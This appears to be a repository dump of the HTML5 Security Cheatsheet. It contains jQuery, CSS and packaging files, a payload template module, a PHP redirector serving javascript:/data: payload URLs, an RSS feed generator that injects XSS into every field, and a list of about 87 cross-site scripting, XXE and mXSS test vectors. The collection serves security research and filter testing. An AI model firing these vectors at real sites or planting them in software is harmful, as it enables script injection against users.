application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(a){return n.globalEval(a),a}}}),n.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),n.ajaxTransport("script",function(a){if(a.crossDomain){var b,c=z.head||n("head")[0]||z.documentElement;return{send:function(d,e){b=z.createElement("script"),b.async=!0,a.scriptCharset&&(b.charset=a.scriptCharset),b.src=a.url,b.onload=b.onreadystatechange=function(a,c){(c||!b.readyState||/loaded|complete/.test(b.readyState))&&(b.onload=b.onreadystatechange=null,b.parentNode&&b.parentNode.removeChild(b),b=null,c||e(200,"success"))},c.insertBefore(b,c.firstChild)},abort:function(){b&&b.onload(void 0,!0)}}}});var ad=[],bd=/(=)\?(?=&|$)|\?\?/;n.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=ad.pop()||n.expando+"_"+wc++;return this[a]=!0,a}}),n.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(bd.test(b.url)?"url":"string"==typeof b.data&&!(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&bd.test(b.data)&&"data");return h||"jsonp"===b.dataTypes[0]?(e=b.jsonpCallback=n.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(bd,"$1"+e):b.jsonp!==!1&&(b.url+=(xc.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||n.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,ad.push(e)),g&&n.isFunction(f)&&f(g[0]),g=f=void 0}),"script"):void 0}),n.parseHTML=function(a,b,c){if(!a||"string"!=typeof a)return null;"boolean"==typeof b&&(c=b,b=!1),b=b||z;var d=v.exec(a),e=!c&&[];return d?[b.createElement(d[1])]:(d=n.buildFragment([a],b,e),e&&e.length&&n(e).remove(),n.merge([],d.childNodes))};var cd=n.fn.load;n.fn.load=function(a,b,c){if("string"!=typeof a&&cd)return cd.apply(this,arguments);var d,e,f,g=this,h=a.indexOf(" ");return h>=0&&(d=a.slice(h,a.length),a=a.slice(0,h)),n.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(f="POST"),g.length>0&&n.ajax({url:a,type:f,dataType:"html",data:b}).done(function(a){e=arguments,g.html(d?n("<div>").append(n.parseHTML(a)).find(d):a)}).complete(c&&function(a,b){g.each(c,e||[a.responseText,b,a])}),this},n.expr.filters.animated=function(a){return n.grep(n.timers,function(b){return a===b.elem}).length};var dd=a.document.documentElement;function ed(a){return n.isWindow(a)?a:9===a.nodeType?a.defaultView||a.parentWindow:!1}n.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=n.css(a,"position"),l=n(a),m={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=n.css(a,"top"),i=n.css(a,"left"),j=("absolute"===k||"fixed"===k)&&n.inArray("auto",[f,i])>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),n.isFunction(b)&&(b=b.call(a,c,h)),null!=b.top&&(m.top=b.top-h.top+g),null!=b.left&&(m.left=b.left-h.left+e),"using"in b?b.using.call(a,m):l.css(m)}},n.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){n.offset.setOffset(this,a,b)});var b,c,d={top:0,left:0},e=this[0],f=e&&e.ownerDocument;if(f)return b=f.documentElement,n.contains(b,e)?(typeof e.getBoundingClientRect!==L&&(d=e.getBoundingClientRect()),c=ed(f),{top:d.top+(c.pageYOffset||b.scrollTop)-(b.clientTop||0),left:d.left+(c.pageXOffset||b.scrollLeft)-(b.clientLeft||0)}):d},position:function(){if(this[0]){var a,b,c={top:0,left:0},d=this[0];return"fixed"===n.css(d,"position")?b=d.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),n.nodeName(a[0],"html")||(c=a.offset()),c.top+=n.css(a[0],"borderTopWidth",!0),c.left+=n.css(a[0],"borderLeftWidth",!0)),{top:b.top-c.top-n.css(d,"marginTop",!0),left:b.left-c.left-n.css(d,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||dd;while(a&&!n.nodeName(a,"html")&&"static"===n.css(a,"position"))a=a.offsetParent;return a||dd})}}),n.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(a,b){var c=/Y/.test(b);n.fn[a]=function(d){return W(this,function(a,d,e){var f=ed(a);return void 0===e?f?b in f?f[b]:f.document.documentElement[d]:a[d]:void(f?f.scrollTo(c?n(f).scrollLeft():e,c?e:n(f).scrollTop()):a[d]=e)},a,d,arguments.length,null)}}),n.each(["top","left"],function(a,b){n.cssHooks[b]=Mb(l.pixelPosition,function(a,c){return c?(c=Kb(a,b),Ib.test(c)?n(a).position()[b]+"px":c):void 0})}),n.each({Height:"height",Width:"width"},function(a,b){n.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){n.fn[d]=function(d,e){var f=arguments.length&&(c||"boolean"!=typeof d),g=c||(d===!0||e===!0?"margin":"border");return W(this,function(b,c,d){var e;return n.isWindow(b)?b.document.documentElement["client"+a]:9===b.nodeType?(e=b.documentElement,Math.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var fd=a.jQuery,gd=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=gd),b&&a.jQuery===n&&(a.jQuery=fd),n},typeof b===L&&(a.jQuery=a.$=n),n});
5 | 


--------------------------------------------------------------------------------
/html/styles/basic.css:
--------------------------------------------------------------------------------
  1 | body {
  2 |     background: #f5fbff;
  3 |     font-size: 13px;
  4 |     line-height: 18px;
  5 |     font-family: sans-serif;
  6 | 	overflow-x: hidden;
  7 | }
  8 | h3, h4 {
  9 |     background: #505050;
 10 |     color: #68c2ff;
 11 |     padding: 5px 10px;
 12 |     border-radius: 5px;
 13 | 	box-shadow: 3px 3px 7px #777;
 14 | 	-moz-box-shadow: 3px 3px 7px #777;
 15 |     -moz-border-radius: 5px
 16 | }
 17 | h1 {
 18 | 	padding: 10px;
 19 |     color: #808080;	
 20 | }
 21 | h3 {
 22 |     border: 1px solid #606060;	
 23 | }
 24 | h1 small {
 25 |     font-size: 12px;
 26 | 	color: #666;
 27 | 	font-weight: normal;
 28 | 	display: block;
 29 | 	position: absolute;
 30 | 	margin-top: -4px;
 31 | }
 32 | h4 {
 33 |     background: #e1e1e1;
 34 |     color: #101010;
 35 | }
 36 | h4 a {
 37 |     font: 11px normal;
 38 |     float: right;
 39 |     background: #505050;
 40 |     color: #68c2ff;
 41 |     text-decoration: none;
 42 |     padding: 3px;
 43 |     margin-left: 3px;
 44 |     border-radius: 5px;
 45 |     -moz-border-radius: 5px;
 46 | }
 47 | h4 a:hover {
 48 |     color: #e1e1e1;
 49 | }
 50 | h4 a:active {
 51 |     color: #fff;
 52 | }
 53 | p {
 54 |     width: 90%;	
 55 |     white-space: pre-line;
 56 | }
 57 | ul li {
 58 |     list-style: none;
 59 | }
 60 | ul li ul li {
 61 |     list-style: circle;
 62 | }
 63 | ul.browsers {
 64 |     padding: 0;
 65 | }
 66 | ul.browsers ul {
 67 |     padding: 0 10px 0 52px;
 68 | 	float: left;
 69 | 	min-height: 32px;	
 70 | }
 71 | ul.browsers li {
 72 |     text-transform: capitalize;
 73 | 	list-style: square;
 74 | }
 75 | ul.browsers li.end {
 76 |     border: 1px solid #666;
 77 |     border-radius: 4px; 
 78 | }
 79 | ul.opera {
 80 |     background: url(../images/opera.png) no-repeat;
 81 | }
 82 | ul.internet.explorer {
 83 |     background: url(../images/ie.png) no-repeat;
 84 | }
 85 | ul.firefox {
 86 |     background: url(../images/firefox.png) no-repeat;
 87 | }
 88 | ul.chrome {
 89 |     background: url(../images/chrome.png) no-repeat;
 90 | }
 91 | ul.safari {
 92 |     background: url(../images/safari.png) no-repeat;
 93 | }
 94 | ul.tags li {
 95 |     list-style: none;
 96 | 	color: #666;
 97 | 	float: left;
 98 | 	font-style: italic;
 99 | 	margin: 0 5px;
100 | }
101 | ul.browsers li:hover,
102 | ul.tags li:hover {
103 |     cursor: pointer;
104 |     text-decoration: underline;   
105 | }
106 | code.attachment {
107 |     margin-bottom: 10px;
108 |     display: block !important;
109 | }
110 | code.attachment span {
111 |     display: block;
112 |     margin-top: 10px;
113 |     font-family: sans-serif;
114 |     color: #666;
115 |     font-size: 11px;
116 | }
117 | code {
118 |     display: block;
119 |     background: #fff;
120 |     padding: 25px;
121 | 	white-space: pre-line;
122 |     border: 3px dashed #e1e1e1;
123 |     border-radius: 10px;
124 |     -moz-border-radius: 10px;
125 | }
126 | dfn {
127 | 	color: #e1e1e1;
128 | 	display: block;
129 | 	text-align: right;	
130 | }
131 | #content {
132 | 	width: 70%;
133 | }
134 | #content > ul {
135 |     padding: 0 0 0 10px;
136 | }
137 | #sidebar {
138 | 	width: 30%;
139 | 	position: fixed;
140 | 	right: 15px;
141 | 	top: 22px;
142 | }
143 | #sidebar a {
144 |     background: #505050;
145 | 	font-size: 12px;
146 | 	overflow: hidden;
147 |     color: #68c2ff;
148 |     padding: 4px;
149 | 	text-decoration: none;
150 | 	display: block;
151 | 	border: 1px solid #606060;
152 |     border-radius: 3px;
153 |     box-shadow: 3px 3px 7px #777;
154 |     -moz-box-shadow: 3px 3px 7px #777;
155 |     -moz-border-radius: 5px
156 | }
157 | #sidebar a:hover {
158 |     color: #e1e1e1;    
159 | }
160 | #sidebar a:active {
161 |     color: #fff;	
162 | }
163 | #languages {
164 |     position: absolute;
165 |     top: -20px; 
166 |     right: 4px;
167 | }
168 | #languages a {
169 |     border: 0;
170 |     background: none;
171 |     padding: 0;
172 |     float: left;
173 |     height: 15px;
174 | }
175 | #search {
176 |     margin-right: 3px;
177 |     display: block;
178 |     width: 60%;
179 |     padding: 10px;
180 |     float: right;
181 |     background: #fff url(../images/search.png) no-repeat top right;
182 |     border: 1px solid #68c2ff;
183 |     border-radius: 3px;
184 |     box-shadow: 3px 3px 7px #777;
185 |     -moz-box-shadow: 3px 3px 7px #777;
186 |     -moz-border-radius: 5px
187 | }
188 | #offline {
189 |     position: fixed;
190 |     display: none;
191 |     color: #fff;
192 |     background: #68c2ff;
193 |     border-radius: 3px;
194 |     padding: 0 5px;
195 |     top: 2px;
196 |     right: 17px;
197 |     box-shadow: 3px 3px 7px #777;
198 |     -moz-box-shadow: 3px 3px 7px #777;
199 |     -moz-border-radius: 5px    
200 | }
201 | noscript {
202 |     font-size: 72px;
203 |     color: #68c2ff;
204 | }
205 | .clear {
206 |     clear: both;
207 | 	display: block;	
208 | }


--------------------------------------------------------------------------------
/lib/index.js:
--------------------------------------------------------------------------------
 1 | var items = require('../items'),
 2 |     payloads = require('../payloads'),
 3 |     categories = require('../categories');
 4 | 
 5 | var h5sc = {};
 6 | 
 7 | h5sc.items = items;
 8 | h5sc.payloads = payloads;
 9 | h5sc.categories = categories;
10 | 
11 | module.exports = h5sc;
12 | 


--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "H5SC",
 3 |   "version": "0.0.0",
 4 |   "description": "HTML5 Security Cheatsheet",
 5 |   "main": "lib/index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "repository": {
10 |     "type": "git",
11 |     "url": "git@github.com:cure53/H5SC.git"
12 |   },
13 |   "keywords": [
14 |     "security"
15 |   ],
16 |   "author": "cure53",
17 |   "license": "Mozilla Public License, version 2.0",
18 |   "bugs": {
19 |     "url": "https://github.com/cure53/H5SC/issues"
20 |   },
21 |   "homepage": "https://github.com/cure53/H5SC"
22 | }
23 | 


--------------------------------------------------------------------------------
/payloads.js:
--------------------------------------------------------------------------------
 1 | /* Payload - the generic payload templates */
 2 | (function (root, factory) {
 3 |     if (typeof define === 'function' && define.amd) {
 4 |         // AMD. Register as an anonymous module.
 5 |         define([], factory);
 6 |     } else if (typeof exports === 'object') {
 7 |         // Node. Does not work with strict CommonJS, but
 8 |         // only CommonJS-like environments that support module.exports,
 9 |         // like Node.
10 |         module.exports = factory();
11 |     } else {
12 |         // Browser globals (root is window)
13 |         root.payloads = factory();
14 |   }
15 | }(this, function () {
16 | return {
17 |     'js_uri_alert'      : 'javascript:alert(1)',
18 |     'js_uri_alert_2'    : 'javascript:alert(2)',
19 |     'js_uri_alert_3'    : 'javascript:alert(3)',
20 |     'js_alert'          : 'alert(1)',
21 |     'js_alert_2'        : 'alert(2)',
22 |     'js_alert_3'        : 'alert(3)',
23 |     'js_alert_only'     : 'alert',
24 |     'js_alert_entities' : '&#x61;l&#x65;rt&#40;1)',
25 |     'js_alert_html5ent' : 'alert&lpar;1&rpar;',
26 |     'js_alert_template' : 'alert`1`',
27 |     'js_esc_template'   : 'alert\\`1\\`',
28 |     'js_write'          : 'write(1)',
29 |     'js_write_2'        : 'write(2)',
30 |     'js_write_only'     : 'write',
31 |     'js_focus'          : 'focus()',
32 |     'js_focus_only'     : 'focus',
33 |     'js_blur'           : 'blur()',
34 |     'js_blur_only'      : 'blur',
35 |     'js_utf7_alert_1'   : '&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi',
36 |     'js_utf7_alert_2'   : '&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>',
37 |     'js_base64_alert'   : 'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
38 |     'html_alert_encoded': '&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;',
39 |     'svg_path'          : 'test.svg',
40 |     'svg_path_2'        : 'test2.svg',
41 |     'svg_path_3'        : 'test5.svg',
42 |     'svg_font_path'     : 'font.svg',
43 |     'css_path'          : 'test.css',
44 |     'vml_path'          : 'test.vml',
45 |     'sct_path'          : 'test.sct',
46 |     'htc_path'          : 'test.htc',
47 |     'xbl_path'          : 'test.xbl',
48 |     'xdr_path'          : 'test.xdr',
49 |     'xxe_path'          : 'http://html5sec.org/test.xxe',
50 |     'swf_path'          : 'test.swf',
51 |     'jar_path'          : 'test.jar',
52 |     'event_path'        : 'event.php'
53 | }
54 | }));
55 | 


--------------------------------------------------------------------------------
/r/.htaccess:
--------------------------------------------------------------------------------
1 | RewriteEngine On
2 | RewriteRule ^([^/]+)/([^/]+)? index.php?payload=$1&code=$2 [L]


--------------------------------------------------------------------------------
/r/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | $base = 'https://html5sec.org';
 4 | 
 5 | $payloads = array(
 6 |     'script'     => $base.'/<script>alert(1)</script>/',
 7 |     'javascript' => 'javascript:alert(1)',
 8 |     'data'       => 'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
 9 |     'jar'        => 'jar:javascript:alert(1)'
10 | );
11 | 
12 | $statuses = array(
13 |     301 => 'Moved Permanently',
14 |     302 => 'Found',
15 |     303 => 'See Other',
16 |     307 => 'Temporary Redirect',
17 |     308 => 'Permanent Redirect',
18 |     999 => 'I am feeling funny'
19 | );
20 | 
21 | $protocol = (substr($_SERVER['SERVER_PROTOCOL'], -1 === '1') ? 'HTTP/1.1' : 'HTTP/1.0');
22 | $code     = $_GET['code'];
23 | $payload  = $_GET['payload'];
24 | 
25 | if(@$statuses[$code]) {
26 |     header($protocol.' '.$code.' '.$statuses[$code]);
27 | }
28 | 
29 | if(@$payloads[$payload]) {
30 |     header('Location: '.$payloads[$payload]);
31 | } else {
32 |     header('Location: '.$payloads['script']);
33 | }
34 | die();
35 | 
36 | 


--------------------------------------------------------------------------------
/rss/.htaccess:
--------------------------------------------------------------------------------
1 | RewriteEngine On
2 | RewriteRule ^(\+[0-9]*)/? index.php?addtime=$1 [L]
3 | RewriteRule ^([0-9]+)/? index.php?unixtime=$1 [L]


--------------------------------------------------------------------------------
/rss/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if(array_key_exists('addtime', $_GET))
 3 | {
 4 | 	header('Content-Type: text/plain');
 5 | 	if(strlen($_GET['addtime']) <= 1)
 6 | 		echo time() + 300;
 7 | 	else
 8 | 		echo time() + intval(substr($_GET['addtime'], 1));
 9 | }
10 | else if(time() < $_GET['unixtime'])
11 | {
12 | 	header('Content-Type: application/rss+xml; charset=UTF-8');
13 | 	echo <<<EOT
14 | <rss version="2.0">
15 | <channel>
16 | <title>HTML5 Security Cheatsheet++ for RSS</title>
17 | <link>https://html5sec.org/rss/</link>
18 | <description>What your feedreader does when you..</description>
19 | </channel>
20 | </rss>
21 | EOT;
22 | }
23 | else
24 | {
25 | header('Content-Type: application/rss+xml; charset=UTF-8');
26 | echo <<<EOT
27 | <?xml version="1.0" encoding="UTF-8"?>
28 | <?xml-stylesheet type="text/xsl" media="screen" href="http://html5sec.org/test.xsl"?>
29 | <rss 
30 |     xmlns:content="http://purl.org/rss/1.0/modules/content/" 
31 |     xmlns:wfw="http://wellformedweb.org/CommentAPI/" 
32 |     xmlns:dc="http://purl.org/dc/elements/1.1/" 
33 |     xmlns:atom="http://www.w3.org/2005/Atom" 
34 |     xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" 
35 |     xmlns:slash="http://purl.org/rss/1.0/modules/slash/" 
36 |     xmlns:georss="http://www.georss.org/georss" 
37 |     xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" 
38 |     xmlns:media="http://search.yahoo.com/mrss/" 
39 |     xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" 
40 |     version="2.0"
41 | >
42 | <channel>
43 | 	<title>HTML5 Security Cheatsheet++ for RSS</title>
44 | 	<link>http://foo.com/?"onclick=prompt(1)/</link>
45 | 	<description><![CDATA[What your feedreader does when you.. <svg onload=alert(/description/)>]]></description>
46 | 	<language>en</language>
47 | 	<generator><![CDATA[<s>000</s>javascript:alert(1)]]></generator>
48 | 	<image>
49 | 		<url>http://html5sec.org/test.svg</url>
50 | 		<title>XSS Test-Vectors</title>
51 | 		<link>data:x,%3cscript%3ealert(/link/)%3c/script%3e</link>
52 | 	</image>
53 | EOT;
54 | $handle = @fopen('rss.txt', 'r');
55 | if ($handle) {
56 | 	$counter = 1;
57 |     while (($buffer = fgets($handle, 4096)) !== false) {
58 |     $buffer = preg_replace('/alert\(\d\)/', 'alert('.$counter.')', $buffer);    	
59 |     $encbuffer = htmlentities($buffer, ENT_QUOTES, 'UTF-8');
60 | echo <<<EOT
61 | 	<item>
62 | 		<title><![CDATA[Vector $counter - "'`>$buffer]]></title>
63 | 		<link>data:x,%3cscript%3ealert(/link/)%3c/script%3e</link>
64 | 		<comments>javascript:prompt($counter)</comments>
65 | 		<pubDate><![CDATA[<iframe src=javascript:prompt(/pubdate/)>]]></pubDate>
66 | 		<dc:creator><![CDATA[$buffer]]></dc:creator>
67 | 		<guid isPermaLink="false">data:x,%3cscript%3ealert(/guid/)%3c/script%3e</guid>
68 |         <enclosure url="http://html5sec.org/test.svg" type="image/svg+xml" />
69 |         <enclosure url="http://html5sec.org/rss/" type="text/html" />
70 |         <link rel="enclosure" type="image/svg+xms" href="http://heideri.ch/test.svg?'onclick=alert(/link-enclosure/)//" />
71 | 		<description><![CDATA[
72 | 			$buffer
73 |             "'`>$encbuffer
74 | 		]]></description>
75 | 	    <content:encoded><![CDATA[
76 | 	    	$buffer
77 |             "'`>$encbuffer
78 | 	    ]]></content:encoded>
79 |         <media:thumbnail url="http://html5sec.org/test.svg?'onclick=alert(/media:thumbnail/)//" />
80 | 		<media:content url='http://html5sec.org/test.svg?"onclick=alert(/media:content/)//' medium="image">
81 | 			<media:title type="html"><![CDATA[$buffer]]></media:title>
82 | 		</media:content>
83 | 	<feedburner:origLink>data:x,%3cscript%3ealert(/origLink/)%3c/script%3e</feedburner:origLink>
84 | 	</item>
85 | EOT;
86 | 	$counter++;
87 |     }
88 |     fclose($handle);
89 | }
90 | 
91 | echo '</channel>
92 | </rss>';
93 | } //else
94 | ?>
95 | 


--------------------------------------------------------------------------------
/rss/rss.txt:
--------------------------------------------------------------------------------
  1 | <form id="test" /><button form="test" formaction="javascript:alert(1)">X
  2 | <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  3 | <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  4 | 0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
  5 | <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  6 | <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
  7 | <input onfocus=write(1) autofocus>
  8 | <input onblur=write(1) autofocus><input autofocus>
  9 | <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X
 10 | <video poster=javascript:alert(1)//
 11 | <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
 12 | <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
 13 | <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
 14 | <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
 15 | <script>({0:#0=alert/#0#/#0#(0)})</script>
 16 | X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
 17 | <?xml-stylesheet href="javascript:alert(1)"?>
 18 | <script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
 19 | <meta charset="mac-farsi">¼script¾alert(1)¼/script¾
 20 | <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
 21 | <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
 22 | <input onblur=focus() autofocus><input>
 23 | <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X
 24 | 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>
 25 | <script src="#">{alert(1)}</script>;1
 26 | +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
 27 | <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
 28 | 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>
 29 | <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
 30 | <style>@import "data:,*%7bx:expression(write(1))%7D";</style>
 31 | <frameset onload=alert(1)>
 32 | <table background="javascript:alert(1)">
 33 | <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
 34 | <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
 35 | 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
 36 | <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
 37 | <!--<img src="--><img src=x onerror=alert(1)//">
 38 | <comment><img src="</comment><img src=x onerror=alert(1))//">
 39 | <![><img src="]><img src=x onerror=alert(1)//">
 40 | <style><img src="</style><img src=x onerror=alert(1)//">
 41 | <li style=list-style:url() onerror=alert(1)><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
 42 | <head><base href="javascript://"></head><body><a href="/. /,alert(1)//#">XXX</a></body>
 43 | <?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html>
 44 | <style>*[{}@import'test.css?]</style>X
 45 | <div style="font-family:'foo&#10;;color:red;';">XXX
 46 | <div style="font-family:foo}color=red;">XXX
 47 | <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
 48 | <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
 49 | <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
 50 | <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
 51 | <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
 52 | <x style="behavior:url(test.sct)">
 53 | <xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label>
 54 | <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
 55 | <video><source onerror="javascript:alert(1)">
 56 | <video onerror="javascript:alert(1)"><source>
 57 | <b <script>alert(1)</script>0
 58 | <b><script<b></b><alert(1)</script </b>
 59 | <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
 60 | <div style="[a]color[b]:[c]red">XXX</div>
 61 | <a x="javasc&#x0Aript:alert(1)" style="\000062\00065\68\0\00 \&#xA0\000061 vio\r:url\28#default#time2);\-\\\00006D\0006f\7A\2d \62 \000069 \06E din\g:url(test.xbl#xss);\-\00006F\0002d\6C\69 \6e \00006B:attr(x);\-\00006F\0002d\6C\69 \6e \00006B-s\ource:current" end=0 onend=alert(1)>XXX
 62 | <x '="foo"><x foo='><img src=x onerror=alert(1)//'>
 63 | <img src="javascript:alert(1)"><image src="javascript:alert(1)"><script src="javascript:alert(1)">
 64 | <!DOCTYPE x[<!ENTITY x SYSTEM "test.xxe">]><y>&x;</y>
 65 | <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
 66 | <?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/>
 67 | <!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "x" onerror CDATA "alert(1)">]><img />
 68 | <doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x></doc>
 69 | <card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
 70 | <div style=width:1px;filter:glow onfilterchange=alert(1)>x
 71 | <// style=x:expression\28write(1)\29>
 72 | <form><button formaction="javascript:alert(1)">X
 73 | <event-source src="event.php" onload="alert(1)">
 74 | <a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
 75 | <script<{alert(1)}/></script </>
 76 | <?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
 77 | <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
 78 | <?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
 79 | <object allowscriptaccess="always" data="test.swf"></object>
 80 | <style>*{x:ｅｘｐｒｅｓｓｉｏｎ(write(1))}</style>
 81 | <x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
 82 | <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
 83 | <x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
 84 | <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
 85 | <x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
 86 | <body oninput=alert(1)><input autofocus>
 87 | <svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a></svg>
